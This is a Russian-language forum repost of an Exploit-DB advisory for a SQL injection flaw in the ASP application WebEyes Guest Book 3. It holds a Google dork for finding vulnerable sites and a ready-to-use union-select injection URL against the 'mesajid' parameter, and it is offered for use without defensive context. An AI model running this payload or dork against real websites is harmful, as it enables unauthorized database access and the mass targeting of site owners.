Exploit WebEyes Guest Book 3 - 'yorum.asp?mesajid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8859
Проверка EDB
  1. Пройдено
Автор
BL@CKBE@RD
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2009-1950
Дата публикации
2009-06-02
Код:
000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000


(
[+] Script               : WEBEYES GUEST BOOK v.3 

[+] Exploit Type         : Remote sql injection exploit

[+] Google Dork          : intitle:WEBEYES GUEST BOOK     inurl:.asp?id=

[+] Contact              : blackbeard-sql A.T hotmail.fr 

--//--> Exploit : 

Remote sql injection Exploit :

http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects

[peace xD]

# milw0rm.com [2009-06-02]
 
Источник
www.exploit-db.com

Похожие темы